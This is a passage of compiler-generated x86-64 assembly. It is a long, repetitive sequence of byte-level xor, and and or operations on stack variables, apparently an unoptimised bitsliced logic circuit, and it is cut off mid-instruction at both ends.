def $al killed $al killed $eax movb %al, -1137(%rbp) movzbl -795(%rbp), %eax xorl $-1, %eax movzbl -802(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -651(%rbp) movzbl -102(%rbp), %eax movzbl -792(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -440(%rbp) movzbl -946(%rbp), %eax xorl $-1, %eax movzbl -449(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -430(%rbp) movzbl -634(%rbp), %eax movzbl -942(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -835(%rbp) movzbl -736(%rbp), %eax xorl $-1, %eax movzbl -625(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1077(%rbp) movzbl -522(%rbp), %eax movzbl -730(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -188(%rbp) movzbl -222(%rbp), %eax xorl $-1, %eax movzbl -913(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -929(%rbp) movzbl -865(%rbp), %eax movzbl -463(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -410(%rbp) movzbl -1016(%rbp), %eax xorl $-1, %eax movzbl -193(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1109(%rbp) movzbl -1218(%rbp), %eax movzbl -130(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -137(%rbp) movzbl -550(%rbp), %eax xorl $-1, %eax movzbl -1076(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -982(%rbp) movzbl -979(%rbp), %eax movzbl -140(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -365(%rbp) movzbl -907(%rbp), %eax xorl $-1, %eax movzbl -411(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -326(%rbp) movzbl -987(%rbp), %eax movzbl -326(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -610(%rbp) movzbl -420(%rbp), %eax movzbl -326(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1131(%rbp) movzbl -570(%rbp), %eax movzbl -1170(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -565(%rbp) movzbl -570(%rbp), %eax movzbl -1170(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -364(%rbp) movzbl -783(%rbp), %eax movzbl -1170(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -169(%rbp) movzbl -1064(%rbp), %eax movzbl -1066(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1069(%rbp) movzbl -1064(%rbp), %eax movzbl -1066(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -390(%rbp) movzbl -247(%rbp), %eax movzbl -1066(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -413(%rbp) movzbl -1158(%rbp), %eax movzbl -97(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1105(%rbp) movzbl -1158(%rbp), %eax movzbl -97(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -437(%rbp) movzbl -764(%rbp), %eax movzbl -97(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -889(%rbp) movzbl -546(%rbp), %eax movzbl -1067(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -242(%rbp) movzbl -546(%rbp), %eax movzbl -1067(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1089(%rbp) movzbl -545(%rbp), %eax movzbl -1067(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1085(%rbp) movzbl -615(%rbp), %eax movzbl -670(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -231(%rbp) movzbl -615(%rbp), %eax movzbl -670(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1160(%rbp) movzbl -622(%rbp), %eax movzbl -670(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -851(%rbp) movzbl -792(%rbp), %eax movzbl -651(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -559(%rbp) movzbl -792(%rbp), %eax movzbl -651(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -932(%rbp) movzbl -102(%rbp), %eax movzbl -651(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1027(%rbp) movzbl -942(%rbp), %eax movzbl -430(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -871(%rbp) movzbl -942(%rbp), %eax movzbl -430(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -241(%rbp) movzbl -634(%rbp), %eax movzbl -430(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1182(%rbp) movzbl -730(%rbp), %eax movzbl -1077(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -664(%rbp) movzbl -730(%rbp), %eax movzbl -1077(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -240(%rbp) movzbl -522(%rbp), %eax movzbl -1077(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -190(%rbp) movzbl -463(%rbp), %eax movzbl -929(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -194(%rbp) movzbl -463(%rbp), %eax movzbl -929(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1179(%rbp) movzbl -865(%rbp), %eax movzbl -929(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1177(%rbp) movzbl -130(%rbp), %eax movzbl -1109(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -533(%rbp) movzbl -130(%rbp), %eax movzbl -1109(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -594(%rbp) movzbl -1218(%rbp), %eax movzbl -1109(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -558(%rbp) movzbl -140(%rbp), %eax movzbl -982(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -915(%rbp) movzbl -140(%rbp), %eax movzbl -982(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -561(%rbp) movzbl -979(%rbp), %eax movzbl -982(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -347(%rbp) movzbl -987(%rbp), %eax movzbl -326(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -687(%rbp) movzbl -622(%rbp), %eax movzbl -231(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -384(%rbp) movzbl -609(%rbp), %eax movzbl -610(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1155(%rbp) movzbl -783(%rbp), %eax movzbl -565(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -611(%rbp) movzbl -346(%rbp), %eax movzbl -364(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -962(%rbp) movzbl -247(%rbp), %eax movzbl -1069(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -373(%rbp) movzbl -134(%rbp), %eax movzbl -390(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -389(%rbp) movzbl -764(%rbp), %eax movzbl -1105(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1079(%rbp) movzbl -888(%rbp), %eax movzbl -437(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -47(%rbp) movzbl -545(%rbp), %eax movzbl -242(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -887(%rbp) movzbl -1017(%rbp), %eax movzbl -1089(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -549(%rbp) movzbl -851(%rbp), %eax movzbl -1160(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -823(%rbp) movzbl -102(%rbp), %eax movzbl -559(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1110(%rbp) movzbl -1027(%rbp), %eax movzbl -932(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -850(%rbp) movzbl -634(%rbp), %eax movzbl -871(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -868(%rbp) movzbl -1182(%rbp), %eax movzbl -241(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -142(%rbp) movzbl -522(%rbp), %eax movzbl -664(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -969(%rbp) movzbl -190(%rbp), %eax movzbl -240(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -794(%rbp) movzbl -865(%rbp), %eax movzbl -194(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -750(%rbp) movzbl -410(%rbp), %eax movzbl -1179(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -412(%rbp) movzbl -1218(%rbp), %eax movzbl -533(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -235(%rbp) movzbl -137(%rbp), %eax movzbl -594(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -924(%rbp) movzbl -979(%rbp), %eax movzbl -915(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -910(%rbp) movzbl -365(%rbp), %eax movzbl -561(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -397(%rbp) movzbl -420(%rbp), %eax movzbl -687(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -392(%rbp) movzbl -421(%rbp), %eax movzbl -392(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -84(%rbp) movzbl -1131(%rbp), %eax xorl $-1, %eax movzbl -1155(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -595(%rbp) movzbl -782(%rbp), %eax movzbl -611(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -739(%rbp) movzbl -169(%rbp), %eax xorl $-1, %eax movzbl -962(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -964(%rbp) movzbl -253(%rbp), %eax movzbl -373(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -262(%rbp) movzbl -413(%rbp), %eax xorl $-1, %eax movzbl -389(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -396(%rbp) movzbl -765(%rbp), %eax movzbl -1079(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -593(%rbp) movzbl -889(%rbp), %eax xorl $-1, %eax movzbl -47(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -327(%rbp) movzbl -886(%rbp), %eax movzbl -887(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -650(%rbp) movzbl -1085(%rbp), %eax xorl $-1, %eax movzbl -549(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1080(%rbp) movzbl -1137(%rbp), %eax xorl $-1, %eax movzbl -823(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -139(%rbp) movzbl -911(%rbp), %eax movzbl -1110(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -912(%rbp) movzbl -440(%rbp), %eax xorl $-1, %eax movzbl -850(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -226(%rbp) movzbl -633(%rbp), %eax movzbl -868(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -860(%rbp) movzbl -835(%rbp), %eax xorl $-1, %eax movzbl -142(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -863(%rbp) movzbl -517(%rbp), %eax movzbl -969(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -232(%rbp) movzbl -188(%rbp), %eax xorl $-1, %eax movzbl -794(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -236(%rbp) movzbl -516(%rbp), %eax movzbl -750(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -38(%rbp) movzbl -1177(%rbp), %eax xorl $-1, %eax movzbl -412(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -637(%rbp) movzbl -1213(%rbp), %eax movzbl -235(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1031(%rbp) movzbl -558(%rbp), %eax xorl $-1, %eax movzbl -924(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -931(%rbp) movzbl -977(%rbp), %eax movzbl -910(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -528(%rbp) movzbl -347(%rbp), %eax xorl $-1, %eax movzbl -397(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -564(%rbp) movzbl -392(%rbp), %eax movzbl -564(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -756(%rbp) movzbl -421(%rbp), %eax movzbl -564(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -328(%rbp) movzbl -611(%rbp), %eax movzbl -595(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -695(%rbp) movzbl -611(%rbp), %eax movzbl -595(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -738(%rbp) movzbl -782(%rbp), %eax movzbl -595(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -320(%rbp) movzbl -373(%rbp), %eax movzbl -964(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -251(%rbp) movzbl -373(%rbp), %eax movzbl -964(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -19(%rbp) movzbl -253(%rbp), %eax movzbl -964(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -926(%rbp) movzbl -1079(%rbp), %eax movzbl -396(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -393(%rbp) movzbl -1079(%rbp), %eax movzbl -396(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -349(%rbp) movzbl -765(%rbp), %eax movzbl -396(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -557(%rbp) movzbl -886(%rbp), %eax movzbl -327(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -18(%rbp) movzbl -886(%rbp), %eax movzbl -327(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -318(%rbp) movzbl -887(%rbp), %eax movzbl -327(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1123(%rbp) movzbl -1015(%rbp), %eax movzbl -1080(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -598(%rbp) movzbl -1015(%rbp), %eax movzbl -1080(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -363(%rbp) movzbl -1021(%rbp), %eax movzbl -1080(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -368(%rbp) movzbl -1110(%rbp), %eax movzbl -139(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -923(%rbp) movzbl -1110(%rbp), %eax movzbl -139(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -914(%rbp) movzbl -911(%rbp), %eax movzbl -139(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1226(%rbp) movzbl -868(%rbp), %eax movzbl -226(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -451(%rbp) movzbl -868(%rbp), %eax movzbl -226(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -256(%rbp) movzbl -633(%rbp), %eax movzbl -226(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -350(%rbp) movzbl -969(%rbp), %eax movzbl -863(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -862(%rbp) movzbl -969(%rbp), %eax movzbl -863(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -234(%rbp) movzbl -517(%rbp), %eax movzbl -863(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -233(%rbp) movzbl -750(%rbp), %eax movzbl -236(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -237(%rbp) movzbl -750(%rbp), %eax movzbl -236(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -775(%rbp) movzbl -516(%rbp), %eax movzbl -236(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -15(%rbp) movzbl -235(%rbp), %eax movzbl -637(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -805(%rbp) movzbl -235(%rbp), %eax movzbl -637(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -536(%rbp) movzbl -1213(%rbp), %eax movzbl -637(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -534(%rbp) movzbl -910(%rbp), %eax movzbl -931(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -930(%rbp) movzbl -910(%rbp), %eax movzbl -931(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -515(%rbp) movzbl -977(%rbp), %eax movzbl -931(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -131(%rbp) movzbl -392(%rbp), %eax movzbl -564(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -182(%rbp) movzbl -911(%rbp), %eax movzbl -923(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -254(%rbp) movzbl -84(%rbp), %eax movzbl -756(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -129(%rbp) movzbl -782(%rbp), %eax movzbl -695(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -185(%rbp) movzbl -739(%rbp), %eax movzbl -738(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -732(%rbp) movzbl -253(%rbp), %eax movzbl -251(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -939(%rbp) movzbl -262(%rbp), %eax movzbl -19(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -224(%rbp) movzbl -765(%rbp), %eax movzbl -393(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -562(%rbp) movzbl -593(%rbp), %eax movzbl -349(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1122(%rbp) movzbl -887(%rbp), %eax movzbl -18(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -33(%rbp) movzbl -650(%rbp), %eax movzbl -318(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -691(%rbp) movzbl -1021(%rbp), %eax movzbl -598(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -746(%rbp) movzbl -489(%rbp), %eax movzbl -363(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1059(%rbp) movzbl -1226(%rbp), %eax movzbl -914(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -12(%rbp) movzbl -633(%rbp), %eax movzbl -451(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -916(%rbp) movzbl -350(%rbp), %eax movzbl -256(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -268(%rbp) movzbl -517(%rbp), %eax movzbl -862(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -133(%rbp) movzbl -233(%rbp), %eax movzbl -234(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -218(%rbp) movzbl -516(%rbp), %eax movzbl -237(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -238(%rbp) movzbl -38(%rbp), %eax movzbl -775(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -776(%rbp) movzbl -1213(%rbp), %eax movzbl -805(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -934(%rbp) movzbl -1031(%rbp), %eax movzbl -536(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -537(%rbp) movzbl -977(%rbp), %eax movzbl -930(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -34(%rbp) movzbl -528(%rbp), %eax movzbl -515(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -514(%rbp) movzbl -421(%rbp), %eax movzbl -182(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -519(%rbp) movzbl -518(%rbp), %eax movzbl -519(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -779(%rbp) movzbl -328(%rbp), %eax xorl $-1, %eax movzbl -129(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -945(%rbp) movzbl -958(%rbp), %eax movzbl -185(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -735(%rbp) movzbl -320(%rbp), %eax xorl $-1, %eax movzbl -732(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -744(%rbp) movzbl -378(%rbp), %eax movzbl -939(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -496(%rbp) movzbl -926(%rbp), %eax xorl $-1, %eax movzbl -224(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -180(%rbp) movzbl -944(%rbp), %eax movzbl -562(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1099(%rbp) movzbl -557(%rbp), %eax xorl $-1, %eax movzbl -1122(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -391(%rbp) movzbl -205(%rbp), %eax movzbl -33(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -73(%rbp) movzbl -1123(%rbp), %eax xorl $-1, %eax movzbl -691(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -711(%rbp) movzbl -1121(%rbp), %eax movzbl -746(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -824(%rbp) movzbl -368(%rbp), %eax xorl $-1, %eax movzbl -1059(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -935(%rbp) movzbl -912(%rbp), %eax xorl $-1, %eax movzbl -12(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -909(%rbp) movzbl -917(%rbp), %eax movzbl -916(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -263(%rbp) movzbl -860(%rbp), %eax xorl $-1, %eax movzbl -268(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -267(%rbp) movzbl -861(%rbp), %eax movzbl -133(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1133(%rbp) movzbl -232(%rbp), %eax xorl $-1, %eax movzbl -218(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -187(%rbp) movzbl -239(%rbp), %eax movzbl -238(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -803(%rbp) movzbl -15(%rbp), %eax xorl $-1, %eax movzbl -776(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -219(%rbp) movzbl -416(%rbp), %eax movzbl -934(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -177(%rbp) movzbl -534(%rbp), %eax xorl $-1, %eax movzbl -537(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -538(%rbp) movzbl -548(%rbp), %eax movzbl -34(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -46(%rbp) movzbl -131(%rbp), %eax xorl $-1, %eax movzbl -514(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -53(%rbp) movzbl -518(%rbp), %eax movzbl -53(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -178(%rbp) movzbl -519(%rbp), %eax movzbl -53(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -870(%rbp) movzbl -958(%rbp), %eax movzbl -945(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -948(%rbp) movzbl -958(%rbp), %eax movzbl -945(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -734(%rbp) movzbl -185(%rbp), %eax movzbl -945(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -508(%rbp) movzbl -378(%rbp), %eax movzbl -744(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -485(%rbp) movzbl -378(%rbp), %eax movzbl -744(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## 